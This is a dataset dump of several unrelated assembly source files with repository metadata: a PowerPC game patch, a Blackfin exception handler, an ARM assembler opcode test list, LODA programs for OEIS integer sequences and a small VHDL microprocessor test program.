35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35
*/
|
||||
TheStack | e77b07e4c8857b9bf5a2c47c8fb6b7bb5a38c3c1 | Assemblycode:Assembly | {"size": 384, "ext": "asm", "max_stars_repo_path": "examples/Preload Stadium Transformations/Core/Reset isLoaded.asm", "max_stars_repo_name": "rapito/VSCode-PowerPC-Syntax", "max_stars_repo_stars_event_min_datetime": "2021-02-10T00:39:56.000Z", "max_stars_repo_stars_event_max_datetime": "2022-02-21T06:15:45.000Z", "max_issues_repo_path": "examples/Preload Stadium Transformations/Core/Reset isLoaded.asm", "max_issues_repo_name": "rapito/VSCode-PowerPC-Syntax", "max_issues_repo_issues_event_min_datetime": "2021-02-10T00:47:07.000Z", "max_issues_repo_issues_event_max_datetime": "2021-02-10T00:47:07.000Z", "max_forks_repo_path": "examples/Preload Stadium Transformations/Core/Reset isLoaded.asm", "max_forks_repo_name": "rapito/VSCode-PowerPC-Syntax", "max_forks_repo_forks_event_min_datetime": "2021-02-10T00:39:58.000Z", "max_forks_repo_forks_event_max_datetime": "2021-07-25T18:42:35.000Z"} | {"max_stars_count": 13, "max_issues_count": 1, "max_forks_count": 2, "avg_line_length": 25.6, "max_line_length": 81, "alphanum_fraction": 0.3958333333} | ################################################################################
# Address: 801d4f14
################################################################################
.include "Common.s"
.include "Common/Preload Stadium Transformations/Transformation.s"
.set PSData,31
#Reset Bool
li r3,0
stb r3,isLoaded(PSData)
Original:
lwz r3, -0x4D28 (r13)
|
||||
TheStack | adab76779364e4627b6b6a2d536bcebddb74252b | Assemblycode:Assembly | {"size": 2143, "ext": "asm", "max_stars_repo_path": "test/visualdsp/unit-test/ExceptionHandler-BF537.asm", "max_stars_repo_name": "malachi-iot/estdlib", "max_stars_repo_stars_event_min_datetime": "2019-01-04T12:02:02.000Z", "max_stars_repo_stars_event_max_datetime": "2021-06-17T01:38:56.000Z", "max_issues_repo_path": "test/visualdsp/unity/ExceptionHandler-BF537.asm", "max_issues_repo_name": "malachi-iot/mc-coap", "max_issues_repo_issues_event_min_datetime": "2020-01-01T06:12:48.000Z", "max_issues_repo_issues_event_max_datetime": "2022-03-29T20:49:21.000Z", "max_forks_repo_path": "test/visualdsp/unity/ExceptionHandler-BF537.asm", "max_forks_repo_name": "malachi-iot/mc-coap", "max_forks_repo_forks_event_min_datetime": "2020-10-19T11:10:13.000Z", "max_forks_repo_forks_event_max_datetime": "2020-10-19T11:10:13.000Z"} | {"max_stars_count": 11, "max_issues_count": 5, "max_forks_count": 1, "avg_line_length": 28.1973684211, "max_line_length": 80, "alphanum_fraction": 0.5496966869} | /* =============================================================================
*
* Description: This is the exception handler.
*
* -----------------------------------------------------------------------------
* Comments:
*
* ===========================================================================*/
#include "VDK.h"
.file_attr prefersMemNum="30";
.file_attr prefersMem="internal";
.file_attr ISR;
.section/doubleany data1;
/* declare external globals */
.extern _ExceptionPanic;
/* declare locals */
.section/doubleany L1_code;
/******************************************************************************
* UserExceptionHandler
*/
/* User Exception Handler entry point */
.GLOBAL UserExceptionHandler;
UserExceptionHandler:
/**
* Handle the exception...
*
* Not all hardware exceptions reach UserExceptionHandler.
* VDK reserves the user exception 0, which is handled by the VDK exception
* handler.
*
* Certain exceptions are handled by the runtime libraries cplb manager.
* Exceptions currently passed by VDK to the cplb manager:
* 0x23 Data access CPLB protection violation
* 0x26 Data CPLB miss
* 0x2C Instruction CPLB miss
*
* It is your responsibility to handle any other exception (user or system)
* here.
*/
/**
* If any exception is handled any registers used either
* directly or indirectly must be saved and restored.
* We do not save and restore the registers used in the call to
* ExceptionPanic because the application will halt and not continue
*/
/**
* Store EXCAUSE in R2 as the value for the panic
* The .message directive removes an informational message related to
* one cycle stall
*/
.message/suppress 1056 for 2 lines;
R2 = SEQSTAT;
R2 <<= 26;
R2 >>= 26;
R1.H = HI(_VDK_kUnhandledExceptionError_);
R1.L = LO(_VDK_kUnhandledExceptionError_);
R0 = _VDK_kUnhandledException_;
CALL.X _ExceptionPanic;
RTX;
.UserExceptionHandler.end:
/* ========================================================================== */
|
||||
TheStack | f65eaaa59dff8706da6a45ce38a1f9bd7501f591 | Assemblycode:Assembly | {"size": 9480, "ext": "asm", "max_stars_repo_path": "tools/asmx2/test/arm.asm", "max_stars_repo_name": "retro16/blastsdk", "max_stars_repo_stars_event_min_datetime": "2017-01-14T16:22:58.000Z", "max_stars_repo_stars_event_max_datetime": "2021-02-16T21:41:48.000Z", "max_issues_repo_path": "tools/asmx2/test/arm.asm", "max_issues_repo_name": "retro16/blastsdk", "max_issues_repo_issues_event_min_datetime": "2016-09-15T21:45:34.000Z", "max_issues_repo_issues_event_max_datetime": "2016-09-17T08:06:06.000Z", "max_forks_repo_path": "tools/asmx2/test/arm.asm", "max_forks_repo_name": "retro16/blastsdk", "max_forks_repo_forks_event_min_datetime": "2016-09-15T22:09:38.000Z", "max_forks_repo_forks_event_max_datetime": "2018-05-21T15:26:30.000Z"} | {"max_stars_count": 10, "max_issues_count": 3, "max_forks_count": 2, "avg_line_length": 22.6252983294, "max_line_length": 59, "alphanum_fraction": 0.6389240506} | CPU ARM_BE
ADC R1,R2,R3 ; E0A21003
ADCS R1,R2,R3 ; E0B21003
ADCEQ R1,R2,R3 ; 00A21003
ADCEQS R1,R2,R3 ; 00B21003
ADC R1,R2,#3 ; E2A21003
ADC R1,R2,R3,LSL #8 ; E0A21403
ADC R1,R2,R3,LSL R4 ; E0A21413
ADC R1,R2,R3,LSR #8 ; E0A21423
ADC R1,R2,R3,LSR R4 ; E0A21433
ADC R1,R2,R3,ASR #8 ; E0A21443
ADC R1,R2,R3,ASR R4 ; E0A21453
ADC R1,R2,R3,ROR #8 ; E0A21463
ADC R1,R2,R3,ROR R4 ; E0A21473
ADC R1,R2,R3,RRX ; E0A21063
ADD R1,R2,R3 ; E0821003
ADDS R1,R2,R3 ; E0921003
ADDEQ R1,R2,R3 ; 00821003
ADCEQS R1,R2,R3 ; 00921003
; E24 = SUB
; E28 = ADD
add r1,pc,#8
ADR R1,. ; E24F1008
ADREQ R1,. ; 024F1008
ADRL R1,. ; E24F1008
ADRLEQ R1,. ; 024F1008
ADRL R1,.+$1000 ; E28F1FFE E2811B03
; ADRL R1,.+$100000 ; E28F1FFE E2811BFF E2811703
; ADRL R1,.+$10000000 ; E28F1FFE E2811BFF E28117FF E2811303
AND R1,R2,R3 ; E0021003
ANDS R1,R2,R3 ; E0121003
ANDEQ R1,R2,R3 ; 00021003
ANDEQS R1,R2,R3 ; 00121003
B . ; EAFFFFFE
BEQ . ; 0AFFFFFE
BNE . ; 1AFFFFFE
BCS . ; 2AFFFFFE
BHS . ; 2AFFFFFE
BCC . ; 3AFFFFFE
BLO . ; 3AFFFFFE
BMI . ; 4AFFFFFE
BPL . ; 5AFFFFFE
BVS . ; 6AFFFFFE
BVC . ; 7AFFFFFE
BHI . ; 8AFFFFFE
BLS . ; 9AFFFFFE
BGE . ; AAFFFFFE
BLT . ; BAFFFFFE
BGT . ; CAFFFFFE
BLE . ; DAFFFFFE
BAL . ; EAFFFFFE
BL . ; EBFFFFFE
BLEQ . ; 0BFFFFFE
BLNE . ; 1BFFFFFE
BLCS . ; 2BFFFFFE
BLHS . ; 2BFFFFFE
BLCC . ; 3BFFFFFE
BLLO . ; 3BFFFFFE
BLMI . ; 4BFFFFFE
BLPL . ; 5BFFFFFE
BLVS . ; 6BFFFFFE
BLVC . ; 7BFFFFFE
BLHI . ; 8BFFFFFE
BLLS . ; 9BFFFFFE
BLGE . ; ABFFFFFE
BLLT . ; BBFFFFFE
BLGT . ; CBFFFFFE
BLLE . ; DBFFFFFE
BLAL . ; EBFFFFFE
BIC R1,R2,R3 ; E1C21003
BICS R1,R2,R3 ; E1D21003
BICEQ R1,R2,R3 ; 01C21003
BICEQS R1,R2,R3 ; 01D21003
BKPT 'BK' ; E124247B
; BLX in ARM5+
BLX . ; FAFFFFFE
; BLXEQ . ; ILLEGAL
BLX R1 ; E12FFF31
BLXEQ R1 ; 012FFF31
; BX in ARM4T, ARM5+
BX R1 ; E12FFF11
BXEQ R1 ; 012FFF11
; CDP in ARM2+
CDP P1,2,CR1,CR2,CR3,3 ; EE221163
CDPEQ P1,2,CR1,CR2,CR3,3 ; 0E221163
; CDP2 in ARM5+
CDP2 P1,2,CR1,CR2,CR3,3 ; FE221163
; CDPEQ2 P1,2,CR1,CR2,CR3,3 ; INVALID
; CLZ in ARM5+
CLZ R1,R2 ; E16F1F12
CLZEQ R1,R2 ; 016F1F12
CMN R1,R2 ; E1710002
CMNEQ R1,R2 ; 01710002
CMP R1,R2 ; E1510002
CMPEQ R1,R2 ; 01510002
EOR R1,R2,R3 ; E0221003
EORS R1,R2,R3 ; E0321003
EOREQ R1,R2,R3 ; 00221003
EOREQS R1,R2,R3 ; 00321003
; LDC in ARM2+
LDC P1,CR1,[R2],{0} ; EC921100
LDCL P1,CR1,[R2],{0} ; ECD21100
LDCEQ P1,CR1,[R2],{0} ; 0C921100
LDCEQL P1,CR1,[R2],{0} ; 0CD21100
; LDC2 in ARM5+
LDC2 P1,CR1,[R2],{0} ; FC921100
LDC2L P1,CR1,[R2],{0} ; FCD21100
LDMIA SP,{r0-r9} ; E89D03FF
LDMEQIA SP,{r0-r9} ; 089D03FF
LDMIB SP,{r0-r9} ; E99D03FF
LDMEQIB SP,{r0-r9} ; 099D03FF
LDMDA SP,{r0-r9} ; E81D03FF
LDMEQDA SP,{r0-r9} ; 081D03FF
LDMDB SP,{r0-r9} ; E91D03FF
LDMEQDB SP,{r0-r9} ; 091D03FF
LDMEA SP,{r0-r9} ; E91D03FF
LDMEQEA SP,{r0-r9} ; 091D03FF
LDMED SP,{r0-r9} ; E99D03FF
LDMEQED SP,{r0-r9} ; 099D03FF
LDMFA SP,{r0-r9} ; E81D03FF
LDMEQFA SP,{r0-r9} ; 081D03FF
LDMFD SP,{r0-r9} ; E89D03FF
LDMEQFD SP,{r0-r9} ; 089D03FF
LDMIA SP!,{r0-r9} ; E8BD03FF
LDMIA SP,{r0-r9}^ ; E8DD03FF
; LDMIA SP!,{r0-r9}^ ; ILLEGAL
LDMIA SP!,{r0-r15}^ ; E8FDFFFF
; LDRH/LDRSB/LDRSH in ARM4+
LDR R1,[R2,+R3] ; E7921003
LDRB R1,[R2,+R3] ; E7D21003
LDRBT R1,[R2],+R3 ; E6F21003
LDRH R1,[R2,+R3] ; E19210B3
LDRSB R1,[R2,+R3] ; E19210D3
LDRSH R1,[R2,+R3] ; E19210F3
LDRT R1,[R2],+R3 ; E6B21003
; LDRX R1,[R2,+R3] ; INVALID
; MCR in ARM2+
MCR P1,2,R1,CR2,CR3,3 ; EE421173
MCREQ P1,2,R1,CR2,CR3,3 ; 0E421173
; MCR2 in ARM5+
MCR2 P1,2,R1,CR2,CR3,3 ; FE421173
; MCREQ2 P1,2,R1,CR2,CR3,3 ; INVALID
; MLA in ARM2+
MLA R1,R2,R3,R4 ; E0214392
MLAS R1,R2,R3,R4 ; E0314392
MLAEQ R1,R2,R3,R4 ; 00214392
MLAEQS R1,R2,R3,R4 ; 00314392
MOV R1,R2 ; E1A01002
MOVS R1,R2 ; E1B01002
MOVEQ R1,R2 ; 01A01002
MOVEQS R1,R2 ; 01B01002
; MRC in ARM2+
MRC P1,2,R1,CR2,CR3,3 ; EE521173
MRCEQ P1,2,R1,CR2,CR3,3 ; 0E521173
; MRC2 in ARM5+
MRC2 P1,2,R1,CR2,CR3,3 ; FE521173
; MRCEQ2 P1,2,R1,CR2,CR3,3 ; INVALID
; MRC2EQ P1,2,R1,CR2,CR3,3 ; INVALID
; MRS in ARM3+
MRS R1,CPSR ; E10F1000
MRS R1,SPSR ; E14F1000
MRSEQ R1,SPSR ; 014F1000
; MSR in ARM3+
MSR CPSR_cxsf,#1 ; E32FF001
MSR CPSR_cxsf,R1 ; E12FF001
MSR SPSR_cxsf,#1 ; E36FF001
MSR SPSR_cxsf,R1 ; E16FF001
MSREQ CPSR_c,#1 ; 0321F001
MSR CPSR_x,#1 ; E322F001
MSR CPSR_s,#1 ; E324F001
MSR CPSR_f,#1 ; E328F001
; MSR CPSR_cc,#1 ; ILLEGAL
; MUL in ARM2+
MUL R1,R2,R3 ; E0010392
MULS R1,R2,R3 ; E0110392
MULEQ R1,R2,R3 ; 00010392
MULEQS R1,R2,R3 ; 00110392
MVN R1,R2 ; E1E01002
MVNS R1,R2 ; E1F01002
MVNEQ R1,R2 ; 01E01002
MVNEQS R1,R2 ; 01F01002
NOP ; E1A00000 (MOV R0,R0)
ORR R1,R2,R3 ; E1821003
ORRS R1,R2,R3 ; E1921003
ORREQ R1,R2,R3 ; 01821003
ORREQS R1,R2,R3 ; 01921003
RSB R1,R2,R3 ; E0621003
RSBS R1,R2,R3 ; E0721003
RSBEQ R1,R2,R3 ; 00621003
RSBEQS R1,R2,R3 ; 00721003
RSC R1,R2,R3 ; E0E21003
RSCS R1,R2,R3 ; E0F21003
RSCEQ R1,R2,R3 ; 00E21003
RSCEQS R1,R2,R3 ; 00F21003
SBC R1,R2,R3 ; E0C21003
SBCS R1,R2,R3 ; E0D21003
SBCEQ R1,R2,R3 ; 00C21003
SBCEQS R1,R2,R3 ; 00D21003
; SMLAL in ARM-M
SMLAL R1,R2,R3,R4 ; E0E21493
SMLALS R1,R2,R3,R4 ; E0F21493
SMLALEQ R1,R2,R3,R4 ; 00E21493
SMLALEQS R1,R2,R3,R4 ; 00F21493
; SMULL in ARM-M
SMULL R1,R2,R3,R4 ; E0C21493
SMULLS R1,R2,R3,R4 ; E0D21493
SMULLEQ R1,R2,R3,R4 ; 00C21493
SMULLEQS R1,R2,R3,R4 ; 00D21493
; STC in ARM5+
STC P1,CR1,[R2],{0} ; EC821100
STCL P1,CR1,[R2],{0} ; ECC21100
STCEQ P1,CR1,[R2],{0} ; 0C821100
STCEQL P1,CR1,[R2],{0} ; 0CC21100
; STC2 in ARM5+
STC2 P1,CR1,[R2],{0} ; FC821100
STC2L P1,CR1,[R2],{0} ; FCC21100
STMIA SP,{r0-r9} ; E88D03FF
STMEQIA SP,{r0-r9} ; 088D03FF
STMIB SP,{r0-r9} ; E98D03FF
STMEQIB SP,{r0-r9} ; 098D03FF
STMDA SP,{r0-r9} ; E80D03FF
STMEQDA SP,{r0-r9} ; 080D03FF
STMDB SP,{r0-r9} ; E90D03FF
STMEQDB SP,{r0-r9} ; 090D03FF
STMEA SP,{r0-r9} ; E88D03FF
STMEQEA SP,{r0-r9} ; 088D03FF
STMED SP,{r0-r9} ; E80D03FF
STMEQED SP,{r0-r9} ; 080D03FF
STMFA SP,{r0-r9} ; E98D03FF
STMEQFA SP,{r0-r9} ; 098D03FF
STMFD SP,{r0-r9} ; E90D03FF
STMEQFD SP,{r0-r9} ; 090D03FF
STMIA SP!,{r0-r9} ; E8AD03FF
; STRH in ARM4+
STR R1,[R2,+R3] ; E7821003
STRB R1,[R2,+R3] ; E7C21003
STRBT R1,[R2],+R3 ; E6E21003
STRH R1,[R2,+R3] ; E18210B3
; STRSB R1,[R2,+R3] ; ILLEGAL
; STRSH R1,[R2,+R3] ; ILLEGAL
STRT R1,[R2],+R3 ; E6A21003
; STRX R1,[R2,+R3] ; INVALID
; STRBTX R1,[R2],+R3 ; INVALID
SUB R1,R2,R3 ; E0421003
SUBS R1,R2,R3 ; E0521003
SUBEQ R1,R2,R3 ; 00421003
SUBEQS R1,R2,R3 ; 00521003
SWI 'ABC' ; EF414243
SWIEQ 'ABC' ; 0F414243
; SWP in ARM2a,ARM3+
SWP R1,R2,[R3] ; E1031092
SWPEQ R1,R2,[R3] ; 01031092
SWPB R1,R2,[R3] ; E1431092
SWPEQB R1,R2,[R3] ; 01431092
TEQ R1,R2 ; E1310002
TEQEQ R1,R2 ; 01310002
TST R1,R2 ; E1110002
TSTEQ R1,R2 ; 01110002
; UMLAL in ARMM
UMLAL R1,R2,R3,R4 ; E0A21493
UMLALS R1,R2,R3,R4 ; E0B21493
UMLALEQ R1,R2,R3,R4 ; 00A21493
UMLALEQS R1,R2,R3,R4 ; 00B21493
; UMULL in ARMM
UMULL R1,R2,R3,R4 ; E0821493
UMULLS R1,R2,R3,R4 ; E0921493
UMULLEQ R1,R2,R3,R4 ; 00821493
UMULLEQS R1,R2,R3,R4 ; 00921493
; === shift addressing modes ===
ADC R1,R2,#3 ; E2A21003
ADC R1,R2,R3 ; E0A21003
ADC R1,R2,R3,LSL #8 ; E0A21403
ADC R1,R2,R3,LSL R4 ; E0A21413
ADC R1,R2,R3,LSR #8 ; E0A21423
ADC R1,R2,R3,LSR R4 ; E0A21433
ADC R1,R2,R3,ASR #8 ; E0A21443
ADC R1,R2,R3,ASR R4 ; E0A21453
ADC R1,R2,R3,ROR #8 ; E0A21463
ADC R1,R2,R3,ROR R4 ; E0A21473
ADC R1,R2,R3,RRX ; E0A21063
; === LDR/STR addressing modes (except BT/T) ===
LDR R1,[R2] ; E5121000
LDR R1,[R2]! ; E5B21000 (?)
LDR R1,[R2,#0] ; E5921000
LDR R1,[R2,#1] ; E5921001
LDR R1,[R2,#-1] ; E5121001
LDR R1,[R2,#+1]! ; E5B21001
LDR R1,[R2,R3] ; E7921003
LDR R1,[R2,+R3] ; E7921003
LDR R1,[R2,-R3] ; E7121003
LDR R1,[R2,+R3]! ; E7B21003
LDR R1,[R2,R3,LSL #1] ; E7921083
LDR R1,[R2,R3,LSR #1] ; E79210A3
LDR R1,[R2,R3,ASL #1] ; E79210B3
LDR R1,[R2,R3,ASR #1] ; E79210C3
LDR R1,[R2,R3,ROR #1] ; E79210E3
LDR R1,[R2,R3,ROR #1]! ; E7B210E3
LDR R1,[R2,R3,RRX] ; E7921063
LDR R1,[R2,R3,RRX]! ; E7B21063
; === LDR/STR addressing modes (including BT/T) ===
LDR R1,[R2],#0 ; E4921000
LDR R1,[R2],#1 ; E4921001
LDR R1,[R2],#-1 ; E4121001
LDR R1,[R2],R3 ; E6921003
LDR R1,[R2],+R3 ; E6921003
LDR R1,[R2],-R3 ; E6121003
LDR R1,[R2],R3,LSL #1 ; E6921083
LDR R1,[R2],R3,LSR #1 ; E69210A3
LDR R1,[R2],R3,ASL #1 ; E6921083
LDR R1,[R2],R3,ASR #1 ; E69210C3
LDR R1,[R2],R3,ROR #1 ; E69210E3
LDR R1,[R2],R3,RRX ; E6921063
; === LDRH/LDRSB/LDRSH addressing modes ===
LDRH R1,[R2] ; E15210B0
LDRH R1,[R2]! ; E1F210B0 (?)
LDRH R1,[R2,#0] ; E1D210B0
LDRH R1,[R2,#1] ; E1D210B1
LDRH R1,[R2,#-1] ; E15210B1
LDRH R1,[R2,#+1]! ; E1F210B1
LDRH R1,[R2,R3] ; E19210B3
LDRH R1,[R2,+R3] ; E19210B3
LDRH R1,[R2,-R3]! ; E13210B3
LDRH R1,[R2],#0 ; E0D210B0
LDRH R1,[R2],#1 ; E0D210B1
LDRH R1,[R2],#-1 ; E05210B1
LDRH R1,[R2],#+1 ; E0D210B1
LDRH R1,[R2],R3 ; E09210B3
LDRH R1,[R2],+R3 ; E09210B3
LDRH R1,[R2],-R3 ; E01210B3
; === coprocessor addrmodes ===
LDC P1,CR1,[R2] ; ED121100
LDC P1,CR1,[R2]! ; EDB21100 (?)
LDC P1,CR1,[R2,#0] ; ED921100
LDC P1,CR1,[R2,#4] ; ED921101
LDC P1,CR1,[R2,#4] ; ED921101
LDC P1,CR1,[R2,#-4] ; ED121101
LDC P1,CR1,[R2,#+4]! ; EDB21101
LDC P1,CR1,[R2],#0 ; ECB21100
LDC P1,CR1,[R2],#4 ; ECB21101
LDC P1,CR1,[R2],#-4 ; EC321101
LDC P1,CR1,[R2],{255} ; EC9211FF
|
||||
TheStack | 137b6f8c51d0fe6ae8aabe8f327df59d9fc92a83 | Assemblycode:Assembly | {"size": 856, "ext": "asm", "max_stars_repo_path": "programs/oeis/169/A169967.asm", "max_stars_repo_name": "neoneye/loda", "max_stars_repo_stars_event_min_datetime": "2018-02-06T19:19:31.000Z", "max_stars_repo_stars_event_max_datetime": "2022-01-17T21:53:31.000Z", "max_issues_repo_path": "programs/oeis/169/A169967.asm", "max_issues_repo_name": "neoneye/loda", "max_issues_repo_issues_event_min_datetime": "2021-02-22T19:00:34.000Z", "max_issues_repo_issues_event_max_datetime": "2021-08-28T10:47:47.000Z", "max_forks_repo_path": "programs/oeis/169/A169967.asm", "max_forks_repo_name": "neoneye/loda", "max_forks_repo_forks_event_min_datetime": "2021-02-24T21:14:16.000Z", "max_forks_repo_forks_event_max_datetime": "2021-08-09T19:48:05.000Z"} | {"max_stars_count": 22, "max_issues_count": 41, "max_forks_count": 5, "avg_line_length": 122.2857142857, "max_line_length": 675, "alphanum_fraction": 0.8247663551} | ; A169967: Numbers whose decimal expansion contains only 0's and 4's.
; 0,4,40,44,400,404,440,444,4000,4004,4040,4044,4400,4404,4440,4444,40000,40004,40040,40044,40400,40404,40440,40444,44000,44004,44040,44044,44400,44404,44440,44444,400000,400004,400040,400044,400400,400404,400440,400444,404000,404004,404040,404044,404400,404404,404440,404444,440000,440004,440040,440044,440400,440404,440440,440444,444000,444004,444040,444044,444400,444404,444440,444444,4000000,4000004,4000040,4000044,4000400,4000404,4000440,4000444,4004000,4004004,4004040,4004044,4004400,4004404,4004440,4004444,4040000,4040004,4040040,4040044,4040400,4040404,4040440,4040444,4044000,4044004,4044040,4044044,4044400,4044404,4044440,4044444,4400000,4400004,4400040,4400044
seq $0,5836 ; Numbers n whose base 3 representation contains no 2.
seq $0,7089 ; Numbers in base 3.
mul $0,4
|
||||
TheStack | 7e9c28e463e0428e21f2248f171a52900ccbff5d | Assemblycode:Assembly | {"size": 675, "ext": "asm", "max_stars_repo_path": "programs/oeis/090/A090198.asm", "max_stars_repo_name": "karttu/loda", "max_stars_repo_stars_event_min_datetime": null, "max_stars_repo_stars_event_max_datetime": null, "max_issues_repo_path": "programs/oeis/090/A090198.asm", "max_issues_repo_name": "karttu/loda", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "programs/oeis/090/A090198.asm", "max_forks_repo_name": "karttu/loda", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": null, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 14.3617021277, "max_line_length": 204, "alphanum_fraction": 0.6222222222} | ; A090198: a(n) = N(5,n), where N(5,x) is the 5th Narayana polynomial.
; 1,42,197,562,1257,2426,4237,6882,10577,15562,22101,30482,41017,54042,69917,89026,111777,138602,169957,206322,248201,296122,350637,412322,481777,559626,646517,743122,850137,968282,1098301,1240962,1397057
mov $1,1
mov $2,10
mov $5,$0
mov $6,$0
lpb $2,1
add $1,$5
sub $2,1
lpe
mov $3,$6
lpb $3,1
sub $3,1
add $4,$5
lpe
mov $2,20
mov $5,$4
lpb $2,1
add $1,$5
sub $2,1
lpe
mov $3,$6
mov $4,0
lpb $3,1
sub $3,1
add $4,$5
lpe
mov $2,10
mov $5,$4
lpb $2,1
add $1,$5
sub $2,1
lpe
mov $3,$6
mov $4,0
lpb $3,1
sub $3,1
add $4,$5
lpe
mov $2,1
mov $5,$4
lpb $2,1
add $1,$5
sub $2,1
lpe
|
||||
TheStack | f79bd7ca5e539a40d902d659046277dd0246c8ad | Assemblycode:Assembly | {"size": 2780, "ext": "asm", "max_stars_repo_path": "programs/oeis/216/A216938.asm", "max_stars_repo_name": "karttu/loda", "max_stars_repo_stars_event_min_datetime": null, "max_stars_repo_stars_event_max_datetime": null, "max_issues_repo_path": "programs/oeis/216/A216938.asm", "max_issues_repo_name": "karttu/loda", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "programs/oeis/216/A216938.asm", "max_forks_repo_name": "karttu/loda", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": null, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 252.7272727273, "max_line_length": 2495, "alphanum_fraction": 0.8956834532} | ; A216938: Number of side-2 hexagonal 0..n arrays with values nondecreasing E, SW and SE
; 10,53,200,606,1572,3630,7656,15015,27742,48763,82160,133484,210120,321708,480624,702525,1006962,1418065,1965304,2684330,3617900,4816890,6341400,8261955,10660806,13633335,17289568,21755800,27176336,33715352,41558880,50916921,62025690,75149997,90585768,108662710,129747124,154244870,182604488,215320479,252936750,296050227,345314640,401444484,465219160,537487300,619171280,711271925,814873410,931148361,1061363160,1206883458,1369179900,1549834066,1750544632,1973133755,2219553686,2491893615,2792386752,3123417648,3487529760,3887433264,4326013120,4806337393,5331665834,5905458725,6531385992,7213336590,7955428164,8762016990,9637708200,10587366295,11616125950,12729403115,13932906416,15232648860,16634959848,18146497500,19774261296,21525605037,23408250130,25430299201,27600250040,29927009882,32419910028,35088720810,37943666904,40995442995,44255229798,47734710439,51446087200,55402098632,59616037040,64101766344,68873740320,73947021225,79337298810,85060909725,91134857320,97576831846,104405231060,111639181238,119298558600,127404011151,135976980942,145039726755,154615347216,164727804340,175401947512,186663537908,198539273360,211056813669,224244806370,238132912953,252751835544,268133344050,284310303772,301316703490,319187684024,337959567275,357669885750,378357412575,400062192000,422825570400,446690227776,471700209760,497900960128,525339353825,554063730506,584123928597,615571319880,648458844606,682841047140,718774112142,756315901288,795525990535,836465707934,879198171995,923788330608,970303000524,1018810907400,1069382726412,1122091123440,1177010796829,1234218519730,1293793183025,1355815838840,1420369744650,1487540407980,1557415631706,1630085559960,1705642724643,1784182092550,1865801113111,1950599766752,2038680613880,2130148844496,2225112328440,2323681666272,2425970240793,2532094269210,2642172855949,2756328046120,2874684879638,2997371446004,3124518939750,3256261716552,3392737350015,3534086689134,3680453916435,3831986606800,3988835786980,4151155995800,4319105345060,4492845581136,4672542147285,4858364246658,5050484906025,5249081040216,5454333517282,5666427224380,5885551134386,6111898373240,6345666288027,6587056515798,6836275053135,7093532326464,7359043263120,7633027363168,7915708771984,8207316353600,8508083764817,8818249530090,9138057117189,9467755013640,9807596803950,10157841247620,10518752357950,10890599481640,11273657379191,11668206306110,12074532094923,12492926238000,12923685971196,13367114358312,13823520376380,14293219001776,14776531297165,15273784499282,15785312107553
add $0,1
mul $0,2
cal $0,339358 ; Maximum number of copies of a 1234567 permutation pattern in an alternating (or zig-zag) permutation of length n + 11.
mov $1,$0
sub $1,320
div $1,32
add $1,10
|
||||
TheStack | e18125feb4666d7bb554a5c3f90c60a3022a5b48 | Assemblycode:Assembly | {"size": 121, "ext": "asm", "max_stars_repo_path": "vhdl-uprocessor/programs/data0.asm", "max_stars_repo_name": "hadryansalles/random-projects", "max_stars_repo_stars_event_min_datetime": "2021-04-02T02:26:47.000Z", "max_stars_repo_stars_event_max_datetime": "2021-05-18T01:56:18.000Z", "max_issues_repo_path": "vhdl-uprocessor/programs/data0.asm", "max_issues_repo_name": "hadryans/random-projects", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "vhdl-uprocessor/programs/data0.asm", "max_forks_repo_name": "hadryans/random-projects", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": 3, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 8.0666666667, "max_line_length": 11, "alphanum_fraction": 0.520661157} | NOP
MOV 511, $1
MOV 341, $2
MOV $1, $3
ADD $2, $3
SUB $1, $3
NOP
CMP $3, $2
BE 2
JR -5
NOP
CMP $3, $0
BE 15
